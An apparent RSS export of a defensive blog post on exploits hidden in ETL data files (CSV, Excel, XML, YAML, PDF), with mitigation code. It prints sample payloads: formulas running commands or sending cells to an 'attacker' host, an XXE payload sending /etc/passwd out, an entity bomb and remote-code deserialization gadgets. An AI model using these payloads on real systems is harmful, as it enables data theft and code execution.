<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:dc="http://purl.org/dc/elements/1.1/">
  <channel>
    <title>DEV Community: Smarking</title>
    <description>The latest articles on DEV Community by Smarking (@smarkinginc).</description>
    <link>https://dev.to/smarkinginc</link>
    <image>
      <url>https://media2.dev.to/dynamic/image/width=90,height=90,fit=cover,gravity=auto,format=auto/https:%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Fuser%2Fprofile_image%2F553741%2F73d2d6bf-7b4e-4dda-8d80-dd27ca67ea30.png</url>
      <title>DEV Community: Smarking</title>
      <link>https://dev.to/smarkinginc</link>
    </image>
    <atom:link rel="self" type="application/rss+xml" href="https://dev.to/feed/smarkinginc"/>
    <language>en</language>
    <item>
      <title>Beware of Exploits in ETL</title>
      <dc:creator>Smarking</dc:creator>
      <pubDate>Tue, 27 Apr 2021 18:17:00 +0000</pubDate>
      <link>https://dev.to/smarkinginc/exploits-in-data-files-2o9d</link>
      <guid>https://dev.to/smarkinginc/exploits-in-data-files-2o9d</guid>
      <description>&lt;h1&gt;
  
  
  Exploits in Data Files
&lt;/h1&gt;

&lt;p&gt;At Smarking we receive data from third-party vendors. This data comes in various formats: XML, CSV, Excel, PDF, and JSON, and we use an Extract-Transform-Load (ETL) process to store the data in our database. This kind of ETL process is used by many organizations that ingest data from external sources. What are the security considerations pertaining to this process?&lt;/p&gt;

&lt;p&gt;The security issue is that a third party may unintentionally provide data laden with exploits. This can happen if the third party accumulates, but does not filter, free-form data submitted by users, such as names, street addresses, or descriptions. The exploits are innocuous at rest but become active once the data is extracted for manual viewing.&lt;/p&gt;

&lt;p&gt;For example, if a cell in a CSV file starts with an equal sign &lt;code&gt;=&lt;/code&gt;, Excel interprets the cell as a formula and evaluates it. Consider this CSV:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Date,First Name,Last Name
2020-07-25,John,Smith
2020-07-25,Mary,Poppins
2020-07-25,"=2+5",Math
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Unfortunately, quoting the cell value does not neutralize this effect: both Apple Numbers and Microsoft Excel render the rogue cell as "7" despite the quotes around &lt;code&gt;"=2+5"&lt;/code&gt;. Cells that begin with &lt;code&gt;+, -, @&lt;/code&gt; can trigger formula evaluation as well. The rendered table looks like this:&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Date&lt;/th&gt;
&lt;th&gt;First Name&lt;/th&gt;
&lt;th&gt;Last Name&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;2020-07-25&lt;/td&gt;
&lt;td&gt;John&lt;/td&gt;
&lt;td&gt;Smith&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;2020-07-25&lt;/td&gt;
&lt;td&gt;Mary&lt;/td&gt;
&lt;td&gt;Poppins&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;2020-07-25&lt;/td&gt;
&lt;td&gt;7&lt;/td&gt;
&lt;td&gt;Math&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;Formulas can also run external commands in the underlying operating system. For example, each of these CSV lines could launch the calculator program &lt;code&gt;calc.exe&lt;/code&gt;:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;...,=DDE("cmd";"/C calc";"__DdeLink_60_870516294"),...
...,=cmd|' /C calc'!A0,...
...,"=2+5+cmd|' /C calc'!A0",...
...,@SUM(cmd|'/c calc' !A0),...
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Excel displays warnings before running external commands, but attackers rely on users' &lt;em&gt;tendency to ignore security warnings in files downloaded from trusted sources.&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Functions that create hyperlinks let attackers steal data from a spreadsheet. If a CSV file contains the following value in a cell, a user who opens the file in Excel sees a link with the text "Error: please click for further information" in that cell. Clicking the link submits the contents of cells &lt;code&gt;A10&lt;/code&gt; and &lt;code&gt;A11&lt;/code&gt; to the attacker. Those cells may contain sensitive information, such as payment details.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;...,=HYPERLINK("http://attacker?leak="&amp;amp;A10&amp;amp;A11,"Error: please click for further information"),...
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The Google Sheets web app is not immune to such attacks either. For instance, the &lt;code&gt;IMPORTXML(url, xpath)&lt;/code&gt; function (documentation &lt;a href="https://support.google.com/docs/answer/3093340"&gt;here&lt;/a&gt;) fetches data from the provided URL and inserts it into the current sheet. Consider what would happen when importing the following CSV into Google Sheets:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;...,"=IMPORTXML(CONCAT(""http://attacker?v="", CONCATENATE(A2:E2)), ""//a"")",...
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The result would be that data in the 2nd row of the spreadsheet spanning cells &lt;code&gt;A2&lt;/code&gt; through &lt;code&gt;E2&lt;/code&gt; would be submitted to the attacker. &lt;/p&gt;

&lt;p&gt;But it gets worse. The URL could also point to &lt;em&gt;another&lt;/em&gt; spreadsheet in your account. By using this technique twice, the attacker can exfiltrate data from any other spreadsheet in your Google account, provided he knows its URL.&lt;/p&gt;

&lt;p&gt;A suggested workaround for these attacks is to prefix every cell that begins with one of the special characters &lt;code&gt;=, +, -, @&lt;/code&gt; with a tab character. This neutralizes the attacks when the data is viewed in Excel and other spreadsheet apps; note, however, that the data is no longer in its original form.&lt;/p&gt;
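&lt;p&gt;A minimal Python sketch of this workaround, using only the standard library, is shown below. The function names and the decision to check every column are assumptions made for illustration; the prefix is a parameter because some guides use a single quote instead of a tab:&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;import csv
import io

# Leading characters that spreadsheet apps may treat as the start of a formula.
FORMULA_PREFIXES = ("=", "+", "-", "@")


def neutralize_cell(value: str, prefix: str = "\t") -> str:
    """Prefix a cell if it begins with a formula-trigger character."""
    if value.startswith(FORMULA_PREFIXES):
        return prefix + value
    return value


def neutralize_csv(text: str) -> str:
    """Return a copy of the CSV text in which every risky cell is prefixed."""
    out = io.StringIO()
    writer = csv.writer(out, lineterminator="\n")
    # Parse with the csv module so that the check sees the cell value =2+5,
    # not the raw quoted text "=2+5".
    for row in csv.reader(io.StringIO(text)):
        writer.writerow([neutralize_cell(cell) for cell in row])
    return out.getvalue()
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;p&gt;Negative numbers such as &lt;code&gt;-3&lt;/code&gt; are prefixed too, so numeric columns may need to be exempted from the check.&lt;/p&gt;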

&lt;p&gt;PDF files, too, are widely used to export reports from administrative websites. If you use libraries like &lt;code&gt;tabula-py&lt;/code&gt; to extract CSVs from such PDFs, the extracted data can carry the exploits mentioned earlier.&lt;/p&gt;

&lt;h2&gt;
  
  
  Full control of data file generation
&lt;/h2&gt;

&lt;p&gt;So far we have looked at regular data files that contain latent exploits. However, if an attacker can manufacture a data file in full, he can do far more damage. His challenge is to deliver such a file to the victim.&lt;/p&gt;

&lt;p&gt;If you receive data files from third parties, failing to authenticate the sender exposes you to phishing attacks. If you receive data files by email, you may be getting them from an impostor. If you receive files through your API, ensure that the third party uses an authentication token. If you download data from a third party, verify its SSL certificate, even if the third party uses a self-signed one. (For tips on how to do that, read our earlier Smarking blog post.)&lt;/p&gt;
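&lt;p&gt;As a rough illustration of the last point, the Python sketch below trusts a vendor's self-signed certificate explicitly instead of switching verification off. It assumes the vendor has shared its certificate in PEM format and that the certificate's host name matches the download URL; the file name &lt;code&gt;vendor-cert.pem&lt;/code&gt; and the URL are hypothetical:&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;import ssl
import urllib.request


def vendor_context(cafile=None):
    """Build a TLS context that always verifies the server certificate.

    If cafile names the vendor's self-signed certificate (PEM), only that
    certificate is trusted; otherwise the system's default CAs are used.
    """
    ctx = ssl.create_default_context(cafile=cafile)
    # These are already the defaults; setting them explicitly documents that
    # verification must never be turned off for vendor downloads.
    ctx.check_hostname = True
    ctx.verify_mode = ssl.CERT_REQUIRED
    return ctx


def download(url, cafile=None, timeout=30):
    """Fetch url over HTTPS; raises if the certificate does not verify."""
    ctx = vendor_context(cafile)
    with urllib.request.urlopen(url, context=ctx, timeout=timeout) as resp:
        return resp.read()


# Hypothetical usage:
# data = download("https://vendor.example/export.csv", cafile="vendor-cert.pem")
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;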

&lt;p&gt;The attacker can also gain control of the data file generation code. This can be accomplished by poisoning public code repositories. The simplest such attack is publishing misspelled variants of popular packages in the hope that users install them by accident. For instance, in 2018 a &lt;a href="https://medium.com/@bertusk/detecting-cyber-attacks-in-the-python-package-index-pypi-61ab2b585c67"&gt;researcher&lt;/a&gt; found a malicious package 'dajngo' in the Python Package Index (PyPI), an intentional misspelling of the popular package 'django'.&lt;/p&gt;
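&lt;p&gt;One cheap guard against this kind of typosquatting is to compare the names in a dependency list against packages you already know and flag near misses. The sketch below uses Python's standard &lt;code&gt;difflib&lt;/code&gt; module; the list of known packages and the 0.8 similarity cutoff are assumptions to adjust for your own project:&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;import difflib

# Hypothetical list of packages this project is known to depend on.
KNOWN_PACKAGES = ["django", "requests", "numpy", "pandas", "lxml", "defusedxml", "pyyaml"]


def suspicious_names(requirements, known=KNOWN_PACKAGES, cutoff=0.8):
    """Return (name, lookalike) pairs for names that resemble, but differ from, a known package."""
    flagged = []
    for name in requirements:
        lowered = name.lower()
        if lowered in known:
            continue  # exact match: the package we meant to install
        match = difflib.get_close_matches(lowered, known, n=1, cutoff=cutoff)
        if match:
            flagged.append((name, match[0]))
    return flagged


print(suspicious_names(["Django", "dajngo", "flask"]))  # [('dajngo', 'django')]
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;p&gt;A flagged name is only a prompt for a human to double-check the spelling; unrelated packages such as &lt;code&gt;flask&lt;/code&gt; pass through untouched.&lt;/p&gt;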

&lt;p&gt;By infecting generated data files rather than the system hosting the malicious code, the attacker delays detection. A malicious data file may introduce a discrepancy into the ETL process that is manually reviewed only weeks later; the victim then downloads and opens the file, infecting his own system. In this way, an exploit at an API source can infect hundreds, if not thousands, of API consumers before the issue is identified. Each infection could open a reverse tunnel to the attacker, creating a pivot point for further network infiltration.&lt;/p&gt;

&lt;h3&gt;
  
  
  Excel files
&lt;/h3&gt;

&lt;p&gt;Much like CSV files, Excel files are subject to formula-based exploits, but they give attackers more tricks to play. A single Excel file can contain multiple worksheets, some of which may be hidden. Excel files can also specify the font size and font color of particular cells, and a white font can be used to hide values. Each cell also has a specific data type associated with it.&lt;/p&gt;

&lt;p&gt;Starting with version 4.0, Excel has supported a kind of macro known as XL4 (Excel 4.0) macros. While standard formulas are limited to workbook-related calculations, XL4 macros allow extensive, Turing-complete programming. To work, they must reside on a macro-enabled sheet.&lt;/p&gt;

&lt;p&gt;There are other behavior differences between CSV and Excel files. An Excel file opens in the Excel app when double-clicked, whereas a CSV file opens in the default spreadsheet app on the user's system (for example, the Numbers app on a Mac). Excel files may also come from an older version of Excel, in which case the installed Excel app attempts to import them. This variety of behaviors gives Excel data files a larger attack surface than CSV files.&lt;/p&gt;

&lt;p&gt;Security researchers at VMware surveyed XL4 exploits in the wild and presented a &lt;a href="https://vblocalhost.com/uploads/VB2020-61.pdf"&gt;report&lt;/a&gt; in November 2020. They demonstrate how the macros can be used to download files from the Internet, execute PowerShell scripts, and change the Windows registry.&lt;/p&gt;

&lt;p&gt;An XL4 macro sequence starts running at the cell that the defined name &lt;code&gt;Auto_Open&lt;/code&gt; refers to and proceeds down the column, cell by cell, until there are no more cells with commands. A &lt;code&gt;=GOTO&lt;/code&gt; statement can direct the program flow to any cell. Combined with &lt;code&gt;FORMULA.FILL&lt;/code&gt;, which can write any value into a cell (including an &lt;code&gt;=&lt;/code&gt; command), &lt;code&gt;GOTO&lt;/code&gt; can be directed to jump to a dynamic location. This allows the attacker to implement flow control such as loops and &lt;code&gt;if&lt;/code&gt; statements, making the script Turing complete.&lt;/p&gt;

&lt;p&gt;The attackers can obfuscate their code so that it does not look like a program. The &lt;code&gt;GOTO&lt;/code&gt; jumping function can be used to obfuscate code by scattering it all over the spreadsheet, including cells not in view. White font can make the cells appear blank. Dynamic code can be generated at run-time by deobfuscating data in cells and converting them into code. Code can also be downloaded from the Internet at runtime, then pasted into a temporary cell and executed. &lt;/p&gt;

&lt;p&gt;As stated earlier, XL4 macros must reside on a macro-enabled sheet in order to work, and security measures are already in place to alert users to the presence of such sheets. However, an attacker can prepare an Excel file without the macro designation and try to trick the user into enabling it manually. For instance, this kind of Excel document has been observed in the wild:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--d00F-YM2--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/pwwldkcl82ohqoe1eoag.png" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--d00F-YM2--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/pwwldkcl82ohqoe1eoag.png" alt="fishing page"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h3&gt;
  
  
  XML, JSON and YAML
&lt;/h3&gt;

&lt;p&gt;XML files can be exploited through Document Type Definitions (DTDs). A DTD is introduced by a declaration such as &lt;code&gt;&amp;lt;!DOCTYPE html&amp;gt;&lt;/code&gt; and can declare external entities, which cause XML parsers to load files from the file system and to generate HTTP requests (an XML External Entity, or XXE, attack). For instance, the following XML file instructs the parser to load a local file and insert its contents into the document body:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;&amp;lt;!DOCTYPE external [
&amp;lt;!ENTITY ee SYSTEM "file:///PATH/TO/simple.xml"&amp;gt;
]&amp;gt;
&amp;lt;root&amp;gt;&amp;amp;ee;&amp;lt;/root&amp;gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;If the attacker can trigger an error that the XML parser reports back to him, the contents of the file might be included in the error message, leaking data to the attacker. Changing the URL to &lt;code&gt;http://example.com/foo.xml&lt;/code&gt; would load a remote file from the Internet instead.&lt;/p&gt;

&lt;p&gt;Using these techniques, an attacker could steal data or perform a Server-Side Request Forgery (SSRF) attack to bypass firewalls. The following XML and DTD combination sends the contents of the &lt;code&gt;/etc/passwd&lt;/code&gt; file to the attacker:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;&amp;lt;?xml version="1.0" encoding="utf-8"?&amp;gt;
&amp;lt;!DOCTYPE root [
 &amp;lt;!ENTITY % file SYSTEM "file:///etc/passwd"&amp;gt;
 &amp;lt;!ENTITY % dtd SYSTEM "http://attacker/evil.dtd"&amp;gt;
 %dtd;
]&amp;gt;
&amp;lt;root&amp;gt;&amp;amp;send;&amp;lt;/root&amp;gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;where &lt;code&gt;evil.dtd&lt;/code&gt; file is:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;&amp;lt;?xml version="1.0" encoding="UTF-8"?&amp;gt;
&amp;lt;!ENTITY % all "&amp;lt;!ENTITY send SYSTEM 'http://example.com/?%file;'&amp;gt;"&amp;gt;
%all;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The attacker can also mount a denial-of-service (DoS) attack by making the parser load a large file:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;&amp;lt;?xml version="1.0"?&amp;gt;
&amp;lt;!DOCTYPE root [
 &amp;lt;!ENTITY file SYSTEM "http://attacker/huge.xml" &amp;gt;
]&amp;gt;
&amp;lt;root&amp;gt;&amp;amp;file;&amp;lt;/root&amp;gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



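&lt;p&gt;Entity expansions can occupy gigabytes of memory using a short XML document. In the following scheme, each entity expands to eight copies of the previous one, so the memory needed grows exponentially with the number of lines: &lt;code&gt;&amp;amp;d;&lt;/code&gt; expands to 10 × 8&lt;sup&gt;3&lt;/sup&gt; = 5,120 characters, and extending the chain to ten entities would yield 10 × 8&lt;sup&gt;9&lt;/sup&gt;, or about 1.3 billion, characters:&lt;br&gt;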
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;&amp;lt;!DOCTYPE xmlbomb [
&amp;lt;!ENTITY a "1234567890" &amp;gt;
&amp;lt;!ENTITY b "&amp;amp;a;&amp;amp;a;&amp;amp;a;&amp;amp;a;&amp;amp;a;&amp;amp;a;&amp;amp;a;&amp;amp;a;"&amp;gt;
&amp;lt;!ENTITY c "&amp;amp;b;&amp;amp;b;&amp;amp;b;&amp;amp;b;&amp;amp;b;&amp;amp;b;&amp;amp;b;&amp;amp;b;"&amp;gt;
&amp;lt;!ENTITY d "&amp;amp;c;&amp;amp;c;&amp;amp;c;&amp;amp;c;&amp;amp;c;&amp;amp;c;&amp;amp;c;&amp;amp;c;"&amp;gt;
]&amp;gt;
&amp;lt;bomb&amp;gt;&amp;amp;d;&amp;lt;/bomb&amp;gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Many XML processing libraries can parse &lt;code&gt;gzip&lt;/code&gt; compressed streams. Some of these libraries are also vulnerable to compression bombs (1GB of zeros can be compressed to a 1MB data stream).&lt;/p&gt;
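&lt;p&gt;One defense against compression bombs is to decompress in bounded chunks and stop as soon as the output passes a size limit you choose, before handing the bytes to the XML parser. A minimal sketch with Python's standard &lt;code&gt;gzip&lt;/code&gt; module follows; the 50 MB limit and the chunk size are arbitrary assumptions:&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;import gzip
import io

MAX_BYTES = 50 * 1024 * 1024  # hypothetical limit on decompressed size


def bounded_gunzip(data: bytes, max_bytes: int = MAX_BYTES, chunk_size: int = 64 * 1024) -> bytes:
    """Decompress gzip data, refusing to produce more than max_bytes of output."""
    out = io.BytesIO()
    with gzip.GzipFile(fileobj=io.BytesIO(data)) as gz:
        while True:
            # read() decompresses at most chunk_size bytes per call, so the
            # total memory used stays close to max_bytes even for a bomb.
            block = gz.read(chunk_size)
            if not block:
                break
            if out.tell() + len(block) > max_bytes:
                raise ValueError("decompressed size exceeds limit")
            out.write(block)
    return out.getvalue()
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;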

&lt;p&gt;In addition, XML parsers have vulnerabilities that are triggered by malformed XML documents. For instance, a large number of unclosed, nested XML tags, as shown below, can exhaust the computer's resources.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;&amp;lt;A1&amp;gt;
 &amp;lt;A2&amp;gt;
  &amp;lt;A3&amp;gt;
   ...
    &amp;lt;A30000&amp;gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Unfortunately, many XML libraries across various languages do not handle such attacks. The Python &lt;code&gt;lxml&lt;/code&gt; library would dutifully load a local file from the filesystem, and the &lt;code&gt;xmlrpc&lt;/code&gt; library would be subject to the memory blowup attack. However, there are specialized libraries, such as &lt;a href="https://pypi.org/project/defusedxml/"&gt;DefusedXML&lt;/a&gt;, that correctly handle such attacks. Use these libraries when working with untrusted data.&lt;/p&gt;

&lt;p&gt;If you are writing an XML parser yourself, use the following guidelines to limit the attack surface: limit parse depth, limit parse time, skip DTDs, and do not expand entities. Also, do not run XPath expressions from untrusted sources, and do not apply XSL transformations (XSLT) received from untrusted sources.&lt;/p&gt;
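&lt;p&gt;A sketch of how some of these guidelines might look on top of the expat bindings in Python's standard library: it rejects any DOCTYPE (and with it, any entity declaration) and caps nesting depth. It does not limit parse time, which would need a separate timeout around the call. The depth limit of 100 and the function names are assumptions, and for most applications an existing library such as DefusedXML is the simpler choice:&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;import xml.parsers.expat

MAX_DEPTH = 100  # hypothetical limit; tune it for your own documents


class UnsafeXML(ValueError):
    """Raised when a document uses a construct this loader refuses."""


def strict_parse(data, max_depth=MAX_DEPTH):
    """Parse untrusted XML with expat; return (depth, tag) pairs for each element.

    Any DOCTYPE (and therefore any DTD or entity declaration) is rejected,
    and so is nesting deeper than max_depth.
    """
    parser = xml.parsers.expat.ParserCreate()
    seen = []
    depth = 0

    def forbid_doctype(name, system_id, public_id, has_internal_subset):
        raise UnsafeXML("DOCTYPE declarations are not allowed")

    def forbid_entity(*args):
        raise UnsafeXML("entity declarations are not allowed")

    def start(tag, attrs):
        nonlocal depth
        depth += 1
        if depth > max_depth:
            raise UnsafeXML("document is nested too deeply")
        seen.append((depth, tag))

    def end(tag):
        nonlocal depth
        depth -= 1

    parser.StartDoctypeDeclHandler = forbid_doctype
    parser.EntityDeclHandler = forbid_entity
    parser.StartElementHandler = start
    parser.EndElementHandler = end
    # Exceptions raised inside the handlers abort parsing and propagate here.
    parser.Parse(data, True)
    return seen
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;p&gt;With this sketch, the entity-expansion and external-entity examples above fail at their DOCTYPE line, and the unclosed nested tags fail once the 101st level is reached.&lt;/p&gt;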

&lt;p&gt;Many APIs accept and return data in JSON or XML formats, with records represented as key-value maps. The records are then stored in a database. Whenever they are exported from the database into a CSV report for analysis, the resulting files are open to the attacks we have already seen.&lt;/p&gt;

&lt;p&gt;Rogue content can get into JSON and XML through an &lt;a href="https://vulncat.fortify.com/en/detail?id=desc.dataflow.java.json_injection#Golang"&gt;injection attack&lt;/a&gt;. This attack is similar to the familiar SQL injection, but it operates on JSON and XML. The following would be an unsafe way to build a JSON document containing a password:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;json = `{..., "password":"${password}"}`
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;This is unsafe because a password can contain quotes, commas, and colons arranged to generate new keys in the resulting JSON. Instead, use a library that escapes values properly.&lt;/p&gt;
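&lt;p&gt;A short Python comparison makes the difference concrete. The attack string is made up for illustration; &lt;code&gt;json.dumps&lt;/code&gt; stands in for "a library that escapes values properly":&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;import json


def unsafe_payload(user, password):
    # String formatting copies quotes and commas from the password verbatim,
    # so a crafted password can close the string and inject new keys.
    return '{"user": "%s", "password": "%s"}' % (user, password)


def safe_payload(user, password):
    # json.dumps escapes quotes, backslashes and control characters.
    return json.dumps({"user": user, "password": password})


evil = 'x", "admin": true, "note": "'
print(json.loads(unsafe_payload("bob", evil)))
# {'user': 'bob', 'password': 'x', 'admin': True, 'note': ''}
print(json.loads(safe_payload("bob", evil)))
# {'user': 'bob', 'password': 'x", "admin": true, "note": "'}
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;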

&lt;p&gt;Many languages have libraries to save, or serialize, objects in JSON, XML, and YAML files and to restore them later in a process called "deserialization." By design, this means that data files embed the names of objects' types and the objects' states. Thus, if an attacker can cause rogue data to be deserialized, he may gain remote code execution. For instance, loading the following YAML document with PyYAML's unsafe loader (&lt;code&gt;yaml.unsafe_load(stream)&lt;/code&gt;, or plain &lt;code&gt;yaml.load(stream)&lt;/code&gt; in PyYAML versions before 5.1) would create a new object of type &lt;code&gt;Foo&lt;/code&gt; with the name parameter "Bar."&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;!!python/object:__main__.Foo {name: Bar}
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;
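&lt;p&gt;With PyYAML, the safe alternative is &lt;code&gt;yaml.safe_load&lt;/code&gt;, which only builds standard YAML types such as dictionaries, lists, strings, and numbers. A minimal sketch, assuming PyYAML is installed; the wrapper name &lt;code&gt;load_untrusted&lt;/code&gt; is hypothetical:&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;import yaml  # PyYAML

DOC = "!!python/object:__main__.Foo {name: Bar}"


def load_untrusted(text):
    """Parse YAML from an untrusted source using only standard YAML tags."""
    return yaml.safe_load(text)


print(load_untrusted("{name: Bar}"))  # {'name': 'Bar'}

try:
    load_untrusted(DOC)
except yaml.constructor.ConstructorError as exc:
    # safe_load has no constructor for python/* tags, so it refuses the
    # document instead of instantiating Foo.
    print("rejected:", exc.problem)
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;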



&lt;p&gt;PyYAML is one of many data loaders with a secondary ability to deserialize objects. A 2017 study [Bechler] cataloged dozens of Java libraries vulnerable to such deserialization attacks. The study reported that if the following file is parsed by Java's &lt;code&gt;XMLDecoder&lt;/code&gt;, the decoder creates the object the attacker specifies and calls a method on it. In this example, it first creates a &lt;code&gt;ProcessBuilder&lt;/code&gt; object and then calls its &lt;code&gt;start&lt;/code&gt; method, which runs the external command &lt;code&gt;/usr/bin/gedit&lt;/code&gt;.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;&amp;lt;new class="java.lang.ProcessBuilder"&amp;gt;
  &amp;lt;string &amp;gt;/usr/bin/gedit &amp;lt;/string&amp;gt; &amp;lt;method name="start" /&amp;gt;
&amp;lt;/new &amp;gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The same study also showed that a vulnerability in Apache Camel's camel-snakeyaml component (CVE-2017-3159) allowed an attacker to make Java's &lt;code&gt;ScriptEngineManager&lt;/code&gt; load and run code from a remote URL:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="kt"&gt;!!&lt;/span&gt; &lt;span class="s"&gt;javax . script . ScriptEngineManager [&lt;/span&gt;
  &lt;span class="s"&gt;!! java . net . URLClassLoader [[&lt;/span&gt;
    &lt;span class="s"&gt;!! java . net . URL [" http :// attacker /"]&lt;/span&gt;
  &lt;span class="s"&gt;]]&lt;/span&gt;
&lt;span class="err"&gt;]&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  PDF Files
&lt;/h3&gt;

&lt;p&gt;Much like MS Office files, PDF files are notorious delivery vehicles for exploits. For instance, in September 2020 a use-after-free bug was discovered in a cache data structure used by Adobe Reader. It led to a code execution exploit, CVE-2020-9715.&lt;/p&gt;

&lt;p&gt;PDF files have a large attack surface. They can contain JavaScript in order to power PDF-based forms. Also, the PDF standard allows embedding arbitrary &lt;a href="https://helpx.adobe.com/ca/acrobat/using/links-attachments-pdfs.html#add_an_attachment"&gt;file attachments&lt;/a&gt;, which makes a PDF document behave much like a "zip" archive. Using such attachments, the attacker can easily embed exploit payloads inside the PDF and then extract them with a small amount of embedded JavaScript. For instance, the &lt;a href="https://6point6.co.uk/insights/abusing-pdf-files/"&gt;CVE-2018-8414&lt;/a&gt; exploit used this technique to embed XML files into a PDF.&lt;/p&gt;

&lt;p&gt;It is simple to embed files inside a PDF. The following &lt;code&gt;pdftk&lt;/code&gt; command attaches &lt;code&gt;data.bin&lt;/code&gt;, a file containing raw binary data, to page 27 of a PDF document:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;$ pdftk manual.pdf attach_files data.bin to_page 27 output manual_plus.pdf
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;For security reasons, modern PDF readers do not automatically execute embedded JavaScript scripts. But in 2010 security researcher Didier Stevens &lt;a href="https://blog.didierstevens.com/2010/03/29/escape-from-pdf/"&gt;found&lt;/a&gt; that it is possible to launch an external program with the &lt;code&gt;/Launch /Action&lt;/code&gt; command sequence, gaining code execution in the host operating system. Acrobat Reader showed a warning, but Didier found a way to alter the message text in order to trick users into ignoring it.&lt;/p&gt;

&lt;p&gt;You can replicate Didier's technique using Metasploit, a security research tool that attackers also use. The technique is implemented as the Metasploit module &lt;code&gt;adobe_pdf_embedded_exe_nojs&lt;/code&gt;, whose documentation states:&lt;/p&gt;

&lt;blockquote&gt;
